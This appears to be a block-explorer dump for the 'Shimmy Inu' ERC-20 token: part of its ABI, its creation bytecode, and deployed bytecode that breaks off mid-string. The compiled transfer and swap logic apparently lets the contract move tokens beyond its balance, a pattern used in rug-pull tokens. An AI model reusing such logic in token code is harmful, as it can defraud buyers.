IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"finalBuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"finalSellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwapWithAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setTokensToSwapAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a0604052620000126009600a6200053d565b6200002290633b9aca0062000555565b6009556009600a6200003591906200053d565b62000045906301312d0062000555565b600a556009600a6200005891906200053d565b62000068906301312d0062000555565b600b55620000796009600a6200053d565b62000088906298968062000555565b600c55600f805461ffff19169055600160108190556011819055601281905560138190556014819055601555348015620000c157600080fd5b506040518060400160405280600a8152602001695368696d6d7920496e7560b01b815250604051806040016040528060068152602001655348494d4d5960d01b815250816003908162000115919062000613565b50600462000124828262000613565b505050620001416200013b6200020a60201b60201c565b6200020e565b737a250d5630b4cf539739df2c5dacb4c659f2488d60808190526200016890600162000260565b600880546001600160a01b031916339081179091556200018b905b600162000260565b600780546001600160a01b03191633908117909155620001ad90600162000295565b620001ba30600162000295565b620001c961dead600162000295565b620001d43362000183565b620001e130600162000260565b620001f061dead600162000260565b6200020430600954620002fe60201b60201c565b620006f5565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6200026a620003c5565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b6200029f620003c5565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b0382166200035a5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b80600260008282546200036e9190620006df565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6005546001600160a01b03163314620004215760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000351565b565b505050565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200047f57816000190482111562000463576200046362000428565b808516156200047157918102915b93841c939080029062000443565b509250929050565b600082620004985750600162000537565b81620004a75750600062000537565b8160018114620004c05760028114620004cb57620004eb565b600191505062000537565b60ff841115620004df57620004df62000428565b50506001821b62000537565b5060208310610133831016604e8410600b841016171562000510575081810a62000537565b6200051c83836200043e565b806000190482111562000533576200053362000428565b0290505b92915050565b60006200054e60ff84168362000487565b9392505050565b808202811582820484141762000537576200053762000428565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200059a57607f821691505b602082108103620005bb57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200042357600081815260208120601f850160051c81016020861015620005ea5750805b601f850160051c820191505b818110156200060b57828155600101620005f6565b505050505050565b81516001600160401b038111156200062f576200062f6200056f565b620006478162000640845462000585565b84620005c1565b602080601f8311600181146200067f5760008415620006665750858301515b600019600386901b1c1916600185901b1785556200060b565b600085815260208120601f198616915b82811015620006b0578886015182559484019460019091019084016200068f565b5085821015620006cf5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b8082018082111562000537576200053762000428565b608051611ec962000749600039600081816103ee01528181610b1401528181610ba501528181610cf101528181610d7601528181610dbc01528181611103015281816111bc01526111f80152611ec96000f3fe6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f00000000000000000000000000000000000000000000000000000000000000008116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000000000000000000000000000000000000000000000600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106110e1576110e1611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561115f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111839190611cf8565b8160018151811061119657611196611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250506111e1307f000000000000000000000000000000000000000000000000000000000000000084610f88565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac9479061124a908590600090869073cfd3c7bbca6bcdb244a798dac5ac806b092e373f904290600401611d8f565b600060405180830381600087803b15801561126457600080fd5b505af1158015611278573d6000803e3d6000fd5b505050505050565b600061128c8484610ee7565b905060001981146112f457818110156112e75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108e1565b6112f48484848403610f88565b50505050565b6001600160a01b0383166113205760405162461bcd60e51b81526004016108e190611e00565b601454600d5410611332576010546012555b601554600e5410611344576011546013555b8060000361135d5761135883836000611997565b505050565b6005546001600160a01b0384811691161480159061138957506005546001600160a01b03838116911614155b801561139d57506001600160a01b03821615155b80156113b457506001600160a01b03821661dead14155b80156113ca5750600854600160a01b900460ff16155b156116c857600f5460ff1661145d576001600160a01b03831660009081526016602052604090205460ff168061141857506001600160a01b03821660009081526016602052604090205460ff165b61145d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108e1565b6001600160a01b03831660009081526018602052604090205460ff16801561149e57506001600160a01b03821660009081526017602052604090205460ff16155b1561158757600a548111156115135760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108e1565b600b5461151f83610814565b6115299083611cce565b111561156d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b600d805490600061157d83611e45565b91905055506116c8565b6001600160a01b03821660009081526018602052604090205460ff1680156115c857506001600160a01b03831660009081526017602052604090205460ff16155b1561164e57600a5481111561163e5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108e1565b600e805490600061157d83611e45565b6001600160a01b03821660009081526017602052604090205460ff166116c857600b5461167a83610814565b6116849083611cce565b11156116c85760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b60006116d330610814565b9050801580159081906116ed5750600f54610100900460ff165b80156117035750600854600160a01b900460ff16155b801561172857506001600160a01b03851660009081526018602052604090205460ff16155b801561174d57506001600160a01b03851660009081526016602052604090205460ff16155b801561177257506001600160a01b03841660009081526016602052604090205460ff16155b156117a1576008805460ff60a01b1916600160a01b17905561179383611abf565b6008805460ff60a01b191690555b6008546001600160a01b03861660009081526016602052604090205460ff600160a01b9092048216159116806117ef57506001600160a01b03851660009081526016602052604090205460ff165b156117f8575060005b60008115611883576001600160a01b03861660009081526018602052604090205460ff161561184857611841606461183b60135488611ae490919063ffffffff16565b90611af7565b9050611865565b611862606461183b60125488611ae490919063ffffffff16565b90505b801561187657611876873083611997565b6118808186611e5e565b94505b61188e878787611997565b50505050505050565b6005546001600160a01b031633146108415760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108e1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119bd5760405162461bcd60e51b81526004016108e190611e00565b6001600160a01b03831660009081526020819052604090205481811015806119ed57506001600160a01b03831630145b611a485760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108e1565b818110611a5757818103611a5a565b60005b6001600160a01b038581166000818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36112f4565b6000611aca30610814565b9050600081600003611ad95750815b5080611358816110ac565b6000611af08284611ce1565b9392505050565b6000611af08284611e71565b600060208083528351808285015260005b81811015611b3057858101830151858201604001528201611b14565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461081157600080fd5b60008060408385031215611b7957600080fd5b8235611b8481611b51565b946020939093013593505050565b600060208284031215611ba457600080fd5b5035919050565b600080600060608486031215611bc057600080fd5b8335611bcb81611b51565b92506020840135611bdb81611b51565b929592945050506040919091013590565b600060208284031215611bfe57600080fd5b8135611af081611b51565b801515811461081157600080fd5b60008060408385031215611c2a57600080fd5b8235611c3581611b51565b91506020830135611c4581611c09565b809150509250929050565b60008060408385031215611c6357600080fd5b8235611c6e81611b51565b91506020830135611c4581611b51565b600181811c90821680611c9257607f821691505b602082108103611cb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561074857610748611cb8565b808202811582820484141761074857610748611cb8565b600060208284031215611d0a57600080fd5b8151611af081611b51565b600060208284031215611d2757600080fd5b8151611af081611c09565b600060208284031215611d4457600080fd5b5051919050565b600080600060608486031215611d6057600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ddf5784516001600160a01b031683529383019391830191600101611dba565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b600060018201611e5757611e57611cb8565b5060010190565b8181038181111561074857610748611cb8565b600082611e8e57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220a48d57b1c32c1f12a802bf0f8e15a9a3560c6e6651142801796338ff7852169864736f6c63430008120033

Deployed Bytecode

0x6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7